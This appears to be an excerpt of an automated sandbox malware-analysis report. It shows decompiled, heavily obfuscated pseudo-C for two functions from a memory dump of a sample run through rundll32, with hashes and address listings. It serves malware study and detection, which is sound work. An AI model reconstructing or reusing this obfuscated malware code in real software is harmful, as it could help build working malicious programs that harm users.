                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $qb+$rg'$uwjP$za%$M
                                                                                                                    • API String ID: 0-3591755710
                                                                                                                    • Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                    • Instruction ID: 3c496515fcd3273a7b524f26ca1969706e7e561950934ce514409f27306c6198
                                                                                                                    • Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                    • Instruction Fuzzy Hash: D01210715083809FD769CF25C48AA5BFBF1FBC4348F50891DF69A8A261DBB19948CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034907F Relevance: 7.8, Strings: 6, Instructions: 261COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E0034907F(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* _t284;
				void* _t285;
				intOrPtr _t286;
				void* _t293;
				void* _t301;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				void* _t311;
				intOrPtr* _t343;
				void* _t347;
				signed int* _t348;

				_t348 =  &_v132;
				_t343 = __ecx;
				_v4 = __ecx;
				_v40 = 0x7c806d;
				_v40 = _v40 + 0x9e80;
				_v40 = _v40 ^ 0x007d1eed;
				_v12 = 0xea5ac0;
				_v12 = _v12 + 0xffff451e;
				_v12 = _v12 ^ 0x00e99fde;
				_v24 = 0xace3a9;
				_t347 = 0;
				_t304 = 0xa;
				_v24 = _v24 / _t304;
				_v24 = _v24 ^ 0x001149f7;
				_t301 = 0x97dfe60;
				_v112 = 0x63471f;
				_v112 = _v112 ^ 0x706c6b64;
				_v112 = _v112 | 0x0d4cecae;
				_v112 = _v112 << 3;
				_v112 = _v112 ^ 0xea7f67f8;
				_v28 = 0x68a2fc;
				_t305 = 0x5b;
				_v28 = _v28 * 0x1c;
				_v28 = _v28 ^ 0x0b71d390;
				_v84 = 0x508d02;
				_v84 = _v84 | 0x7bfb7ba7;
				_v84 = _v84 ^ 0x7bffa5e3;
				_v124 = 0xc0d8a4;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 ^ 0xdba96bec;
				_v124 = _v124 + 0xffffcd63;
				_v124 = _v124 ^ 0xdb66cc39;
				_v116 = 0xc7a01f;
				_v116 = _v116 * 0x50;
				_v116 = _v116 << 7;
				_v116 = _v116 + 0x525d;
				_v116 = _v116 ^ 0x3100192e;
				_v88 = 0x173e76;
				_v88 = _v88 / _t305;
				_v88 = _v88 + 0xcdb8;
				_v88 = _v88 ^ 0x00098d3b;
				_v48 = 0x3a45de;
				_t306 = 0x3d;
				_v48 = _v48 / _t306;
				_v48 = _v48 ^ 0x0006d702;
				_v52 = 0xd8d0f7;
				_v52 = _v52 | 0xabcf1793;
				_v52 = _v52 + 0xffff6a1e;
				_v52 = _v52 ^ 0xabd8e28c;
				_v64 = 0xff5420;
				_v64 = _v64 >> 9;
				_v64 = _v64 + 0xffff2626;
				_v64 = _v64 ^ 0xfff0768b;
				_v80 = 0x65116e;
				_v80 = _v80 >> 9;
				_v80 = _v80 | 0xde6750c8;
				_v80 = _v80 ^ 0xde6208e1;
				_v56 = 0x2d6903;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 + 0xffff4c70;
				_v56 = _v56 ^ 0xfff58c10;
				_v132 = 0xe5be5a;
				_v132 = _v132 + 0xfffffbec;
				_v132 = _v132 << 3;
				_v132 = _v132 ^ 0x46ad3c03;
				_v132 = _v132 ^ 0x418237eb;
				_v108 = 0x3fa801;
				_v108 = _v108 + 0x902;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x9ac0b97a;
				_v108 = _v108 ^ 0x9ac73a04;
				_v72 = 0x454e35;
				_v72 = _v72 + 0x4c9c;
				_t307 = 0x29;
				_v72 = _v72 / _t307;
				_v72 = _v72 ^ 0x000328df;
				_v32 = 0x46b9f;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0003d4b9;
				_v16 = 0xab007f;
				_v16 = _v16 ^ 0x56a4e801;
				_v16 = _v16 ^ 0x56002f48;
				_v100 = 0xb9d48c;
				_v100 = _v100 | 0xb434f54e;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x000dcd0e;
				_v92 = 0x17070b;
				_t308 = 0x37;
				_v92 = _v92 / _t308;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x0038b56c;
				_v60 = 0xdb418a;
				_v60 = _v60 * 0x4d;
				_v60 = _v60 << 2;
				_v60 = _v60 ^ 0x07c52fa3;
				_v68 = 0x99d1b0;
				_v68 = _v68 << 1;
				_v68 = _v68 + 0xadc1;
				_v68 = _v68 ^ 0x01384a96;
				_v120 = 0xfb4a64;
				_v120 = _v120 | 0x92bfeeef;
				_v120 = _v120 + 0x1827;
				_v120 = _v120 >> 5;
				_v120 = _v120 ^ 0x0494323d;
				_v128 = 0xf75f57;
				_v128 = _v128 >> 4;
				_v128 = _v128 + 0xe158;
				_v128 = _v128 + 0xffff16ce;
				_v128 = _v128 ^ 0x000f9950;
				_v76 = 0xb94cf;
				_v76 = _v76 | 0xc911a6ab;
				_v76 = _v76 >> 2;
				_v76 = _v76 ^ 0x3240c46f;
				_v104 = 0x7ca07;
				_v104 = _v104 * 0x23;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0xe4d42587;
				_v104 = _v104 ^ 0xe4c14657;
				_v44 = 0x308a5a;
				_v44 = _v44 >> 0x10;
				_v44 = _v44 ^ 0x0006e55e;
				_v96 = 0x427aa5;
				_v96 = _v96 + 0xed3d;
				_v96 = _v96 + 0xffff13f4;
				_v96 = _v96 ^ 0x0046a078;
				_v20 = 0xf8f4;
				_v20 = _v20 * 0x4a;
				_t284 = 0x4469cd4;
				_v20 = _v20 ^ 0x004ab19f;
				_v36 = 0x7998ac;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x0008cf6c;
				do {
					while(_t301 != _t284) {
						if(_t301 == 0x661bd7c) {
							E0033957D(_v8, _v96, _v20, _v28, _v36);
						} else {
							if(_t301 == 0x8cd68b1) {
								_push(_v116);
								_push(_v124);
								_t293 = E0034DCF7(_v84, 0x331954, __eflags);
								_push(_v52);
								_push(_v48);
								__eflags = E00339462(_t293, _v80,  &_v8, E0034DCF7(_v88, 0x331814, __eflags), _v56, _v40) - _v12;
								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
								E0033A8B0(_v132, _t293, _v108);
								E0033A8B0(_v72, _t294, _v32);
								_t343 = _v4;
								L8:
								_t284 = 0x4469cd4;
								_t348 =  &(_t348[0xb]);
								goto L9;
							} else {
								if(_t301 != 0x97dfe60) {
									goto L9;
								} else {
									_t301 = 0x8cd68b1;
									continue;
								}
							}
						}
						L12:
						return _t347;
					}
					_push(_v92);
					_push(_v100);
					_t285 = E0034DCF7(_v16, 0x331854, __eflags);
					_pop(_t311);
					_t286 =  *0x353dfc; // 0x0
					__eflags = E0033AA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
					_t301 = 0x661bd7c;
					_t347 =  ==  ? 1 : _t347;
					E0033A8B0(_v104, _t285, _v44);
					goto L8;
					L9:
					__eflags = _t301 - 0x94c729c;
				} while (__eflags != 0);
				goto L12;
			}


















































                                                                                                                    0x0034907f
                                                                                                                    0x00349089
                                                                                                                    0x0034908b
                                                                                                                    0x00349092
                                                                                                                    0x0034909c
                                                                                                                    0x003490a4
                                                                                                                    0x003490ac
                                                                                                                    0x003490b7
                                                                                                                    0x003490c2
                                                                                                                    0x003490cd
                                                                                                                    0x003490db
                                                                                                                    0x003490dd
                                                                                                                    0x003490e2
                                                                                                                    0x003490eb
                                                                                                                    0x003490f6
                                                                                                                    0x003490fb
                                                                                                                    0x00349103
                                                                                                                    0x0034910b
                                                                                                                    0x00349113
                                                                                                                    0x00349118
                                                                                                                    0x00349120
                                                                                                                    0x0034912d
                                                                                                                    0x00349130
                                                                                                                    0x00349134
                                                                                                                    0x0034913c
                                                                                                                    0x00349144
                                                                                                                    0x0034914c
                                                                                                                    0x00349154
                                                                                                                    0x0034915c
                                                                                                                    0x00349164
                                                                                                                    0x0034916c
                                                                                                                    0x00349174
                                                                                                                    0x0034917c
                                                                                                                    0x00349189
                                                                                                                    0x0034918d
                                                                                                                    0x00349192
                                                                                                                    0x0034919a
                                                                                                                    0x003491a2
                                                                                                                    0x003491b2
                                                                                                                    0x003491b6
                                                                                                                    0x003491be
                                                                                                                    0x003491c6
                                                                                                                    0x003491d2
                                                                                                                    0x003491d5
                                                                                                                    0x003491d9
                                                                                                                    0x003491e1
                                                                                                                    0x003491e9
                                                                                                                    0x003491f1
                                                                                                                    0x003491f9
                                                                                                                    0x00349201
                                                                                                                    0x00349209
                                                                                                                    0x0034920e
                                                                                                                    0x00349216
                                                                                                                    0x0034921e
                                                                                                                    0x00349226
                                                                                                                    0x0034922b
                                                                                                                    0x00349233
                                                                                                                    0x0034923b
                                                                                                                    0x00349243
                                                                                                                    0x00349248
                                                                                                                    0x00349250
                                                                                                                    0x00349258
                                                                                                                    0x00349260
                                                                                                                    0x00349268
                                                                                                                    0x0034926d
                                                                                                                    0x00349277
                                                                                                                    0x0034927f
                                                                                                                    0x00349287
                                                                                                                    0x0034928f
                                                                                                                    0x00349294
                                                                                                                    0x0034929c
                                                                                                                    0x003492a4
                                                                                                                    0x003492ac
                                                                                                                    0x003492ba
                                                                                                                    0x003492bf
                                                                                                                    0x003492c5
                                                                                                                    0x003492cd
                                                                                                                    0x003492d5
                                                                                                                    0x003492da
                                                                                                                    0x003492e2
                                                                                                                    0x003492ed
                                                                                                                    0x003492f8
                                                                                                                    0x00349303
                                                                                                                    0x0034930b
                                                                                                                    0x00349313
                                                                                                                    0x00349318
                                                                                                                    0x00349320
                                                                                                                    0x0034932c
                                                                                                                    0x0034932f
                                                                                                                    0x00349333
                                                                                                                    0x00349338
                                                                                                                    0x00349340
                                                                                                                    0x0034934d
                                                                                                                    0x00349351
                                                                                                                    0x00349356
                                                                                                                    0x0034935e
                                                                                                                    0x00349366
                                                                                                                    0x0034936a
                                                                                                                    0x00349372
                                                                                                                    0x0034937a
                                                                                                                    0x00349382
                                                                                                                    0x0034938a
                                                                                                                    0x00349392
                                                                                                                    0x00349397
                                                                                                                    0x0034939f
                                                                                                                    0x003493a7
                                                                                                                    0x003493ac
                                                                                                                    0x003493b4
                                                                                                                    0x003493bc
                                                                                                                    0x003493c4
                                                                                                                    0x003493cc
                                                                                                                    0x003493d4
                                                                                                                    0x003493d9
                                                                                                                    0x003493e1
                                                                                                                    0x003493ee
                                                                                                                    0x003493f2
                                                                                                                    0x003493f7
                                                                                                                    0x003493ff
                                                                                                                    0x00349407
                                                                                                                    0x0034940f
                                                                                                                    0x00349414
                                                                                                                    0x0034941c
                                                                                                                    0x00349424
                                                                                                                    0x0034942c
                                                                                                                    0x00349434
                                                                                                                    0x0034943c
                                                                                                                    0x0034944f
                                                                                                                    0x00349456
                                                                                                                    0x0034945b
                                                                                                                    0x00349466
                                                                                                                    0x0034946e
                                                                                                                    0x00349473
                                                                                                                    0x0034947b
                                                                                                                    0x0034947b
                                                                                                                    0x00349489
                                                                                                                    0x003495e5
                                                                                                                    0x0034948f
                                                                                                                    0x00349495
                                                                                                                    0x003494aa
                                                                                                                    0x003494b3
                                                                                                                    0x003494bb
                                                                                                                    0x003494c0
                                                                                                                    0x003494cb
                                                                                                                    0x0034950e
                                                                                                                    0x00349519
                                                                                                                    0x0034951c
                                                                                                                    0x0034952e
                                                                                                                    0x00349533
                                                                                                                    0x003495b5
                                                                                                                    0x003495b5
                                                                                                                    0x003495ba
                                                                                                                    0x00000000
                                                                                                                    0x00349497
                                                                                                                    0x0034949d
                                                                                                                    0x00000000
                                                                                                                    0x003494a3
                                                                                                                    0x003494a3
                                                                                                                    0x00000000
                                                                                                                    0x003494a3
                                                                                                                    0x0034949d
                                                                                                                    0x00349495
                                                                                                                    0x003495ef
                                                                                                                    0x003495f9
                                                                                                                    0x003495f9
                                                                                                                    0x0034953c
                                                                                                                    0x00349545
                                                                                                                    0x00349550
                                                                                                                    0x00349556
                                                                                                                    0x00349564
                                                                                                                    0x003495a0
                                                                                                                    0x003495a2
                                                                                                                    0x003495ab
                                                                                                                    0x003495b0
                                                                                                                    0x00000000
                                                                                                                    0x003495bd
                                                                                                                    0x003495bd
                                                                                                                    0x003495bd
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5NE$=$H/$X$]R$dklp
                                                                                                                    • API String ID: 0-668800459
                                                                                                                    • Opcode ID: 37b07f1614df070e92d938dc5a543b96f66459f49eca731d5b22bb1b86773717
                                                                                                                    • Instruction ID: ddde8de6715dfc2cc1b9efb5558bab8e5df9c23eb794cf4281b4f7f1471c5a71
                                                                                                                    • Opcode Fuzzy Hash: 37b07f1614df070e92d938dc5a543b96f66459f49eca731d5b22bb1b86773717
                                                                                                                    • Instruction Fuzzy Hash: 3FD11FB11087808FD769CF25C48A60BBBF1FBC5758F50891DF1AA8A260DBB59949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00350F33 Relevance: 7.8, Strings: 6, Instructions: 260COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00350F33() {
				signed int _t237;
				signed char _t246;
				signed short _t255;
				signed int _t262;
				signed char _t269;
				intOrPtr* _t292;
				signed short _t301;
				void* _t302;
				signed short _t306;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed short _t319;
				void* _t321;

				 *(_t321 + 0x20) = 0xee0abc;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
				_t262 = 0x40ff1a8;
				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
				 *(_t321 + 0x14) = 0x97563a;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
				_t309 = 0x68;
				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
				 *(_t321 + 0x54) = 0x46dfd;
				_t310 = 0x22;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
				 *(_t321 + 0x50) = 0x65d669;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
				 *(_t321 + 0x1c) = 0xa5dab8;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
				 *(_t321 + 0x58) = 0x508bac;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
				 *(_t321 + 0x38) = 0x6dc462;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
				 *(_t321 + 0x20) = 0x10f337;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
				_t311 = 0x7a;
				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
				 *(_t321 + 0x28) = 0x5a8e56;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
				 *(_t321 + 0x40) = 0x558325;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
				 *(_t321 + 0x3c) = 0x76576d;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
				 *(_t321 + 0x38) = 0x7fcfc;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
				 *(_t321 + 0x58) = 0x685aea;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
				 *(_t321 + 0x24) = 0x2cb25b;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
				 *(_t321 + 0x20) = 0x5c4f5f;
				_t312 = 0x75;
				_t306 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
				_t319 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
				 *(_t321 + 0x48) = 0x281dd4;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
				 *(_t321 + 0x60) = 0x5ec984;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
				 *(_t321 + 0x4c) = 0xbf15d9;
				_t313 = 0x6c;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
				_t314 = 0x6b;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
				 *(_t321 + 0x30) = 0x4468c3;
				_t315 = 0x7e;
				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
				while(1) {
					L1:
					_t292 =  *0x353e08; // 0x0
					while(1) {
						L2:
						_t237 =  *(_t321 + 0x60);
						L3:
						while(_t262 != 0x160fcc4) {
							if(_t262 == 0x26954f0) {
								 *_t237 = _t319;
								_t262 = 0xfeff895;
								 *_t292 =  *_t292 + 1;
								_t237 = _t319;
								 *(_t321 + 0x60) = _t237;
								continue;
							} else {
								if(_t262 == 0x40ff1a8) {
									_t179 = _t292 + 0x20; // 0x20
									_t237 = _t179;
									_t262 = 0x5ead19b;
									 *(_t321 + 0x60) = _t237;
									continue;
								} else {
									if(_t262 == 0x58e8483) {
										_push(_t262);
										_push(_t262);
										_t302 = 0x40;
										_t319 = E00337FF2(_t302);
										__eflags = _t319;
										if(__eflags == 0) {
											goto L20;
										} else {
											_t262 = 0x160fcc4;
											goto L1;
										}
									} else {
										if(_t262 == 0x5ead19b) {
											_t255 = E00347BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x353000);
											 *(_t321 + 0x70) = _t255;
											_t306 = _t255;
											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
											_t262 = 0x58e8483;
											while(1) {
												L1:
												_t292 =  *0x353e08; // 0x0
												goto L2;
											}
										} else {
											if(_t262 == 0xd41016e) {
												E00348519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
												L20:
												_t292 =  *0x353e08; // 0x0
											} else {
												if(_t262 != 0xfeff895) {
													L17:
													__eflags = _t262 - 0x20f61b3;
													if(__eflags != 0) {
														L2:
														_t237 =  *(_t321 + 0x60);
														continue;
													}
												} else {
													asm("sbb ecx, ecx");
													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
													continue;
												}
											}
										}
									}
								}
							}
							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
							__eflags = 1;
							return 1;
						}
						_push( *(_t321 + 0x1c));
						_push( *(_t321 + 0x38));
						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
						E00341652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E0034DCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x331590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
						E0033A8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
						_t321 = _t321 + 0x3c;
						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
						_t246 =  *((intOrPtr*)(_t306 + 6));
						_t269 =  *((intOrPtr*)(_t306 + 7));
						_t306 = _t306 + 8;
						_t262 = 0x26954f0;
						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
						__eflags = _t301;
						 *(_t319 + 0x18) = _t301;
						_t292 =  *0x353e08; // 0x0
						goto L17;
					}
				}
			}





















                                                                                                                    0x00350f36
                                                                                                                    0x00350f40
                                                                                                                    0x00350f48
                                                                                                                    0x00350f56
                                                                                                                    0x00350f5a
                                                                                                                    0x00350f62
                                                                                                                    0x00350f6a
                                                                                                                    0x00350f72
                                                                                                                    0x00350f80
                                                                                                                    0x00350f85
                                                                                                                    0x00350f8b
                                                                                                                    0x00350f93
                                                                                                                    0x00350fa0
                                                                                                                    0x00350fa3
                                                                                                                    0x00350fa7
                                                                                                                    0x00350faf
                                                                                                                    0x00350fb7
                                                                                                                    0x00350fbc
                                                                                                                    0x00350fc4
                                                                                                                    0x00350fd1
                                                                                                                    0x00350fd5
                                                                                                                    0x00350fda
                                                                                                                    0x00350fdf
                                                                                                                    0x00350fe7
                                                                                                                    0x00350fef
                                                                                                                    0x00350ff7
                                                                                                                    0x00350fff
                                                                                                                    0x0035100f
                                                                                                                    0x00351013
                                                                                                                    0x0035101b
                                                                                                                    0x00351023
                                                                                                                    0x0035102b
                                                                                                                    0x00351035
                                                                                                                    0x00351036
                                                                                                                    0x0035103a
                                                                                                                    0x0035103f
                                                                                                                    0x00351047
                                                                                                                    0x0035104f
                                                                                                                    0x0035105d
                                                                                                                    0x00351061
                                                                                                                    0x00351066
                                                                                                                    0x0035106e
                                                                                                                    0x00351076
                                                                                                                    0x0035107e
                                                                                                                    0x00351086
                                                                                                                    0x0035108e
                                                                                                                    0x00351096
                                                                                                                    0x0035109a
                                                                                                                    0x003510a2
                                                                                                                    0x003510aa
                                                                                                                    0x003510b2
                                                                                                                    0x003510bc
                                                                                                                    0x003510c0
                                                                                                                    0x003510c8
                                                                                                                    0x003510d0
                                                                                                                    0x003510d8
                                                                                                                    0x003510e0
                                                                                                                    0x003510e8
                                                                                                                    0x003510f0
                                                                                                                    0x003510f8
                                                                                                                    0x003510fd
                                                                                                                    0x00351107
                                                                                                                    0x00351116
                                                                                                                    0x00351119
                                                                                                                    0x0035111d
                                                                                                                    0x00351129
                                                                                                                    0x0035112d
                                                                                                                    0x00351131
                                                                                                                    0x00351139
                                                                                                                    0x00351141
                                                                                                                    0x00351149
                                                                                                                    0x0035114e
                                                                                                                    0x00351156
                                                                                                                    0x0035115e
                                                                                                                    0x00351166
                                                                                                                    0x0035116e
                                                                                                                    0x00351176
                                                                                                                    0x00351182
                                                                                                                    0x00351187
                                                                                                                    0x00351191
                                                                                                                    0x00351196
                                                                                                                    0x0035119c
                                                                                                                    0x003511a4
                                                                                                                    0x003511b1
                                                                                                                    0x003511b2
                                                                                                                    0x003511bc
                                                                                                                    0x003511c5
                                                                                                                    0x003511c9
                                                                                                                    0x003511d1
                                                                                                                    0x003511d1
                                                                                                                    0x003511d1
                                                                                                                    0x003511d7
                                                                                                                    0x003511d7
                                                                                                                    0x003511d7
                                                                                                                    0x00000000
                                                                                                                    0x003511db
                                                                                                                    0x003511ed
                                                                                                                    0x003512a8
                                                                                                                    0x003512aa
                                                                                                                    0x003512af
                                                                                                                    0x003512b1
                                                                                                                    0x003512b3
                                                                                                                    0x00000000
                                                                                                                    0x003511f3
                                                                                                                    0x003511f9
                                                                                                                    0x00351297
                                                                                                                    0x00351297
                                                                                                                    0x0035129a
                                                                                                                    0x0035129f
                                                                                                                    0x00000000
                                                                                                                    0x003511ff
                                                                                                                    0x00351205
                                                                                                                    0x00351277
                                                                                                                    0x00351278
                                                                                                                    0x0035127b
                                                                                                                    0x00351281
                                                                                                                    0x00351285
                                                                                                                    0x00351287
                                                                                                                    0x00000000
                                                                                                                    0x0035128d
                                                                                                                    0x0035128d
                                                                                                                    0x00000000
                                                                                                                    0x0035128d
                                                                                                                    0x00351207
                                                                                                                    0x0035120d
                                                                                                                    0x0035124c
                                                                                                                    0x00351252
                                                                                                                    0x00351256
                                                                                                                    0x0035125d
                                                                                                                    0x00351261
                                                                                                                    0x003511d1
                                                                                                                    0x003511d1
                                                                                                                    0x003511d1
                                                                                                                    0x00000000
                                                                                                                    0x003511d1
                                                                                                                    0x0035120f
                                                                                                                    0x00351215
                                                                                                                    0x0035138c
                                                                                                                    0x00351392
                                                                                                                    0x00351392
                                                                                                                    0x0035121b
                                                                                                                    0x00351221
                                                                                                                    0x00351373
                                                                                                                    0x00351373
                                                                                                                    0x00351379
                                                                                                                    0x003511d7
                                                                                                                    0x003511d7
                                                                                                                    0x00000000
                                                                                                                    0x003511d7
                                                                                                                    0x00351227
                                                                                                                    0x0035122b
                                                                                                                    0x00351233
                                                                                                                    0x00000000
                                                                                                                    0x00351233
                                                                                                                    0x00351221
                                                                                                                    0x00351215
                                                                                                                    0x0035120d
                                                                                                                    0x00351205
                                                                                                                    0x003511f9
                                                                                                                    0x0035139b
                                                                                                                    0x003513a1
                                                                                                                    0x003513a7
                                                                                                                    0x003513ac
                                                                                                                    0x003513ac
                                                                                                                    0x003512c4
                                                                                                                    0x003512ca
                                                                                                                    0x003512d5
                                                                                                                    0x003512dc
                                                                                                                    0x0035131e
                                                                                                                    0x00351333
                                                                                                                    0x0035133c
                                                                                                                    0x0035134a
                                                                                                                    0x0035134e
                                                                                                                    0x00351351
                                                                                                                    0x00351354
                                                                                                                    0x00351361
                                                                                                                    0x00351366
                                                                                                                    0x00351366
                                                                                                                    0x00351369
                                                                                                                    0x0035136d
                                                                                                                    0x00000000
                                                                                                                    0x0035136d
                                                                                                                    0x003511d7

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
